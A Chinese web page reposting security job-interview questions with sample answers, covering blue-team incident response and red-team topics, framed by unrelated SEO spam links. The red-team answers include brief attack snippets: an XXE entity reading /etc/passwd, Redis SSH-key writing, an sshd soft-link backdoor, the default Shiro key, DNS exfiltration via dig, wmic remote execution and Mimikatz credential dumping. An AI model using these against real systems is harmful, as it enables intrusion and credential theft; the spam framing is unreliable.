当前位置: 首页 > wzjs >正文

龙华做网站哪家便宜常州免费网站建站模板

龙华做网站哪家便宜,常州免费网站建站模板,博采网络股吧,深圳宝安区今天疫情最新情况网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 各厂商二面试题01 一、青藤(蓝队) 1. 自我介绍 2. 设备误报处理(日…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 各厂商二面试题01

一、青藤(蓝队)

1. 自我介绍

2. 设备误报处理(日志)

3. 扫描流量与手动流量的区分

4. 被拿Shell的应急响应

5. 代理数据流分析

二、360(蓝队)

1. 溯源与态势感知

2. 基础漏洞原理

三、漏洞盒子

1. 印象最深的渗透经历

2. 漏洞平台提交与排名

3. 挖洞与渗透测试

四、未知厂商

1. 中间件漏洞

2. 权限维持手段

3. 隧道与代理

五、长亭-红队(红队)

1. 打点漏洞

2. Shiro漏洞检测

3. Shiro漏洞类型

4. 不出网场景利用

5. 横向渗透与密码抓取

6. 会话劫持


 各厂商二面试题01

一、青藤
蓝队1、自我介绍2、设备误报如何处理(日志)3、如何查看区分是扫描流量和手动流量(扫描数据量大,请求有规律,手动扫描间隔较少)4、被拿shell了如何处理(排查、清除、关站、看看可有即使修复的可能,没有可能就关站)5、如何分析被代理出来的数据流二、360
蓝队1、溯源  态势感知  安全设备2、基础的漏洞原理  ssrf xxe  Redis几种利用方式三、漏洞盒子
1、印象最深的渗透经历,技术关键点2、是否在漏洞平台有提交过漏洞,以及排名情况3、平时挖洞的情况,平台提交漏洞和渗透测试方面四、未知厂商
1、讲一下使过的中间件漏洞2、getshell后如何维持权限3、隧道、流量代理方面五、长亭-红队
红队(内容稍多)问:打点一般会用什么漏洞问:平常怎么去发现shiro漏洞的问:shiro有几种漏洞类型问:weblogic权限绕过有没有了解问:fastjson漏洞利用原理问:weblogic有几种漏洞问:IIOP听说过吗,和什么类似问:这几个漏洞不出网情况下怎么办问:拿到webshell不出网情况下怎么办问:dns出网协议怎么利用问:横向渗透命令执行手段问:psexec和wmic或者其他的区别问:Dcom怎么操作?问:抓取密码的话会怎么抓问:什么版本之后抓不到密码问:抓不到的话怎么办问:域内攻击方法有了解过吗问:桌面有管理员会话,想要做会话劫持怎么做

一、青藤(蓝队)

1. 自我介绍

需结合个人经验,突出以下要素:

  • 攻防演练经历(如护网行动中的角色、成果);
  • 安全设备运维经验(如EDR、WAF、蜜罐的部署与分析);
  • 威胁分析能力(如日志分析、流量溯源)。
2. 设备误报处理(日志)
  • 验证误报:对比原始日志与设备告警,检查请求参数、响应状态码是否合理;
  • 分类处理:通过白名单(如业务IP、合法扫描工具)或调整检测规则阈值;
  • 自动化优化:结合SIEM系统标记低风险事件,减少人工干预。
3. 扫描流量与手动流量的区分
  • 扫描流量特征
    • 高频请求(如每秒数十次同路径访问);
    • 固定User-Agent(如sqlmap、Nmap标识);
    • 覆盖全端口/IP段(如顺序扫描1-65535端口)。
  • 手动流量特征
    • 请求间隔随机(人工操作延迟);
    • 参数尝试性变化(如手工测试SQL注入的'1=1);
    • 关联登录态(如携带Cookie的敏感操作)。
4. 被拿Shell的应急响应
  • 隔离阶段
    • 立即断开服务器网络或关闭非核心服务;
    • 保留现场(内存转储、进程快照)。
  • 排查阶段
    • 查Web日志定位入侵路径(如上传漏洞、反序列化入口);
    • 检查计划任务、启动项、隐藏进程(如Linux cron、Windows注册表);
    • 比对Webshell哈希与正常文件。
  • 修复阶段
    • 修补漏洞(如框架升级、配置加固);
    • 部署HIDS监控异常行为(如命令执行、敏感目录访问)。
5. 代理数据流分析
  • 流量特征提取
    • 协议识别(如HTTP代理流量中的CONNECT方法);
    • 载荷分析(如Base64编码的隧道数据);
  • 行为关联
    • 追踪源IP与目标IP的会话持续性;
    • 检测异常DNS请求(如DNS隧道中的长域名查询)。

二、360(蓝队)

1. 溯源与态势感知
  • 溯源方法
    • 结合威胁情报(如IP信誉库、恶意域名库);
    • 关联多设备日志(如防火墙拦截记录 + EDR进程树分析)。
  • 态势感知设备联动
    • 通过NDR(网络检测与响应)实时分析流量;
    • 与SOAR平台集成自动化封禁恶意IP。
2. 基础漏洞原理
  • SSRF:利用服务端发起内部请求(如读取file:///etc/passwd或攻击Redis);
  • XXE:解析外部实体导致文件读取/SSRF(如<!ENTITY xxe SYSTEM "file:///etc/passwd">);
  • Redis利用
    • 未授权写SSH密钥(config set dir /root/.ssh);
    • 主从复制RCE(通过SLAVEOF加载恶意模块)。

三、漏洞盒子

1. 印象最深的渗透经历

案例:某金融系统通过链式漏洞突破边界:

  • 信息泄露:Git源码暴露数据库配置;
  • 垂直越权:修改Cookie中的userid参数访问管理员接口;
  • RCE:利用Fastjson反序列化注入内存马。
    技术关键点:绕过WAF规则(如分块传输编码、注释符混淆)。
2. 漏洞平台提交与排名
  • 示例回答:在EDUSRC/CNVD提交过20+漏洞,曾获某季度TOP 10;
  • 强调漏洞类型多样性(如逻辑漏洞占比40%,配置错误占比30%)。
3. 挖洞与渗透测试
  • 平台提交:侧重自动化工具+人工验证(如AWVS扫描后手工挖掘业务逻辑漏洞);
  • 渗透测试:红队协作模式(如内网横向渗透时结合BloodHound分析域环境)。

四、未知厂商

1. 中间件漏洞
  • Apache:解析漏洞(.php.xxx 被当作PHP执行);
  • Nginx:错误配置导致目录穿越(/files../);
  • Tomcat:CVE-2017-12615(PUT上传漏洞)。
2. 权限维持手段
  • 后门类型
    • Web层:隐藏Webshell(如.index.php.swp );
    • 系统层:SSH软链接后门(ln -sf /usr/sbin/sshd /tmp/su);
  • 计划任务:Linux cron或Windows任务计划程序加载恶意脚本。
3. 隧道与代理
  • 工具选择
    • HTTP隧道:reGeorg/proxychains;
    • ICMP/DNS隧道:icmpsh/dnscat2;
  • 隐蔽性优化:流量加密(如AES) + 模拟合法协议(如伪装成Cloudflare流量)。

五、长亭-红队(红队)

1. 打点漏洞
  • 高频漏洞
    • Web框架漏洞(如Shiro反序列化、Fastjson RCE);
    • 中间件漏洞(Weblogic T3协议反序列化);
    • 未授权访问(如Redis、Hadoop YARN)。
2. Shiro漏洞检测
  • 识别特征:Cookie中的rememberMe字段;
  • 利用方式
    • 密钥硬编码(如默认密钥kPH+bIxk5D2deZiIxcaaaA==);
    • 反序列化Gadget(如CommonsBeanutils链)。
3. Shiro漏洞类型
  • 反序列化漏洞(CVE-2016-4437);
  • 权限绕过(CVE-2020-1957);
  • 密钥硬编码(默认密钥未修改)。
4. 不出网场景利用
  • 协议复用
    • 利用SMB协议进行内网穿透(如Procmon监控445端口);
    • DNS Log外带数据(如通过dig xxx.ceye.io 回传结果)。
  • 工具适配
    • 不出网Webshell使用内存马(如Java Agent注入);
    • 通过ICMP隧道执行命令(如PingTunnel)。
5. 横向渗透与密码抓取
  • 横向命令执行
    • WMI执行远程命令(wmic /node:192.168.1.2 process call create "cmd.exe" );
    • DCOM通过MMC20.Application组件调用(GetObject("winmgmts:\\\\192.168.1.2\\..."))。
  • 密码抓取与绕过
    • 工具:Mimikatz(sekurlsa::logonpasswords);
    • Windows 2012后需绕过LSA保护(如加载驱动mimidrv.sys );
    • 无明文密码时使用PTH(Pass-the-Hash)或Kerberos票证攻击。
6. 会话劫持
  • 工具与方法
    • 使用Mimikatz的ts::sessions查看会话ID;
    • 通过RDP劫持(如Shadow Attack)接管已登录的会话;
    • 注入DLL到explorer.exe 进程获取用户令牌。
http://www.dtcms.com/wzjs/503272.html

相关文章:

  • 重庆建设摩托车官方网站培训机构营业执照如何办理
  • 青浦网站建设公司曹操seo博客
  • seo网站权重2022最新时事新闻及点评
  • 如何做企业套模网站口碑营销的特征
  • 网站做视频的软件有哪些中小企业管理培训课程
  • 海口网站建设高端快手流量推广免费网站
  • 南京市住房与城乡建设局网站百度百度百度一下
  • 杭州知名设计公司北京seo学校
  • 中央批评太原疫情大地seo
  • 网站备案拍照要求阿里云服务器
  • 网站建设自助建站网站服务器信息查询
  • 网站设计结构图用什么做网站关键词快速排名工具
  • 做一个网站的建设过程长沙seo技术培训
  • 做网站应该用什么配置的手提电脑短视频平台推广
  • 网站开发与设计实训总结两千字北京营销网站制作
  • 广州建外贸网站公司市场调查报告
  • 哪里有营销型网站公司百度推广的四种收费形式
  • 看动漫是怎么做视频网站seo免费教程
  • 你访问的网站正在建设安卓嗅探app视频真实地址
  • 造纸公司网站建设网络营销策划方案书
  • wordpress 二次元长春seo优化
  • 网站开发的工作制度软文台
  • 武汉网站优化排名seo是什么意思为什么要做seo
  • 深圳保障性住房统一轮候信息系统宁波seo公司排名
  • 网站上做扫一扫培训心得简短200字
  • 专业购物网站定制成都新闻今日最新消息
  • wordpress 导出md广州seo推广优化
  • 网络维护网站美工软文广告经典案例100字
  • 网站 租用服务器网站关键词优化软件
  • 合肥哪里有做网站seo推广专员